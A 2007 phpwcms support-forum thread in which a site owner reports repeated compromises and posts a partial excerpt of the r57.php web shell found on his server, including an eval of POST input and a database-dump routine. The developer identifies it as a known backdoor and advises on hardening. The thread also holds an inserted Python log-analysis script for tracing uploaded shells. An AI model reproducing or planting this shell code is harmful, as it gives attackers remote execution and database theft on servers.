
Posted: Tue 2. Oct 2007, 01:23
by C3 Motorsport
Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.

Oliver
I posted this one not too long ago...

http://www.phpwcms.de/forum/viewtopic.php?t=15646

I've been hacked over and over and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.

I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.

My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)

Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.

The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.

Code:

","",$eval);
 @eval($eval);}
if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";

...........

[Notice: Code partially removed by Oliver]


Posted: Tue 2. Oct 2007, 07:20
by Oliver Georgi
@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver

Posted: Tue 2. Oct 2007, 07:48
by C3 Motorsport
Oliver Georgi wrote:@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver,

Thank you very much for responding so quickly. I can understand why you removed some of the code. I just posted it so you would know specifically what I was dealing with.

The version I am using on all of my sites is 1.3.3

http://www.jason-steele.com
http://www.c3motorsport.com
http://www.5-75.org
http://www.blackwidowproject.com

As for setting the register_globals to off...I don't own the server, and I do not believe that FatNetwork will make the appropriate change solely for me, given the large number of people on the servers.

I will PM you with the pertinent login info and would greatly appreciate any guidance/direction you can give me to seal up this hacking nightmare.

Posted: Wed 3. Oct 2007, 10:20
by MattDwyer
One of my sites running 1.3.3 was hacked just recently, however it was ftp they broke into, not the website itself. They downloaded dozens of pages, altered, and re-uploaded them. It got my client blacklisted by Google for a few days.

Another client (also running 1.3.3) is seeing daily attempts to inject a URL.
The URLs point to PHP information-gathering scripts, but I tried it myself and got nothing other than the expected webpage.

I'm pretty certain that kind of attack will never work, but if someone would like to confirm that with a quick reply, I'd be much relieved. I am still monitoring the site and checking various settings just to be safe.

Posted: Wed 3. Oct 2007, 10:51
by Oliver Georgi
I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver

Posted: Wed 3. Oct 2007, 22:14
by C3 Motorsport
Oliver Georgi wrote:I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver has been a great help to me in identifying a lot of these issues, and I'm very grateful for his time. I've started implementing some of the corrective measures he's suggested on my other accounts and hopefully they will suppress most of the future attacks.

My next question is this: through the .htaccess and _.htaccess files, how do I set safe_mode to "on" for the local account (much like we did for register_globals) and then set "open_basedir"?

The cPanel I can do little about, and all 3rd party applications have been removed from my account with the exception of 1 commercial program which has no security issues that I'm aware of.

Posted: Thu 4. Oct 2007, 05:14
by Pappnase
hello

If you google a little you will find that these settings can only be changed by your host.

But I think that's not your biggest problem ... some of the settings are equal to my settings ...

Maybe you should take a look at your logfiles and search for the PHP file which was uploaded to your space. There you should also see which script they used for uploading.
Oliver Georgi wrote:
- 3rd party scripts with known problems
- older releases of cPanel
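The log review Pappnase describes (find the first request to the dropped PHP file, then look at what the same client POSTed to just before it) is easy to automate. The following script is an added example for this thread, not code from phpwcms or from any poster; the access-log lines are constructed in Apache combined format, and the paths /upload/upload.php and /upload/r57.php are hypothetical placeholders for whatever appears in a real log.

```python
import re
from datetime import datetime, timedelta

# Constructed sample of Apache combined-format access log lines (not real data).
# The scenario: one client POSTs to an upload script, then a new file r57.php
# is requested for the first time from the same address.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Oct/2007:22:41:03 +0200] "GET /index.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [01/Oct/2007:22:41:20 +0200] "POST /upload/upload.php HTTP/1.1" 200 310 "-" "Mozilla/4.0"
203.0.113.7 - - [01/Oct/2007:22:41:35 +0200] "GET /upload/r57.php HTTP/1.1" 200 18240 "-" "Mozilla/4.0"
203.0.113.7 - - [01/Oct/2007:22:42:01 +0200] "POST /upload/r57.php HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
198.51.100.4 - - [01/Oct/2007:22:45:10 +0200] "GET /index.php?id=2 HTTP/1.1" 200 4980 "http://example.org/" "Mozilla/5.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    # Strip the query string so /index.php?id=1 and /index.php?id=2 compare equal.
    entry["path"] = entry["target"].split("?", 1)[0]
    return entry


def parse_log(text):
    """Parse every line of a log; silently skip lines that do not match the format."""
    return [e for e in (parse_line(l) for l in text.splitlines()) if e]


def unknown_php_paths(entries, allowlist):
    """Requested .php paths that are not part of the known site: candidates for dropped files."""
    return sorted(
        {e["path"] for e in entries if e["path"].endswith(".php") and e["path"] not in allowlist}
    )


def first_hit(entries, suspect_path):
    """The earliest request for the suspect file, or None if it was never requested."""
    hits = [e for e in entries if e["path"] == suspect_path]
    return min(hits, key=lambda e: e["time"]) if hits else None


def candidate_uploaders(entries, suspect_path, window_minutes=30):
    """POST targets hit by the same client shortly before the suspect file first appeared.

    Whatever script accepted the upload must have been called before the file could be
    requested, so the POSTs in this window are where to start looking for the hole."""
    first = first_hit(entries, suspect_path)
    if first is None:
        return []
    window = timedelta(minutes=window_minutes)
    return [
        e["path"]
        for e in entries
        if e["ip"] == first["ip"]
        and e["method"] == "POST"
        and e["path"] != suspect_path
        and first["time"] - window <= e["time"] < first["time"]
    ]


if __name__ == "__main__":
    entries = parse_log(SAMPLE_LOG)
    known = {"/index.php", "/upload/upload.php"}  # assumed list of the site's own scripts
    for path in unknown_php_paths(entries, known):
        hit = first_hit(entries, path)
        print(f"{path}: first requested {hit['time']} from {hit['ip']}")
        print("  POSTed to just before:", candidate_uploaders(entries, path))
```

Run it against a real log by replacing SAMPLE_LOG with the file contents and the allowlist with the site's actual PHP files; the first-hit timestamp also tells you which filesystem modification times to compare against when checking what else changed on the account.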

Posted: Thu 4. Oct 2007, 07:33
by Oliver Georgi
register_globals is at first the best you can do and always has to be set Off - it's the default PHP configuration and has been for several years. In combination with safe_mode On it's better, but that is not as important as register_globals set Off.

Oliver

Posted: Thu 4. Oct 2007, 09:32
by C3 Motorsport
Got it. Thanks for the tip!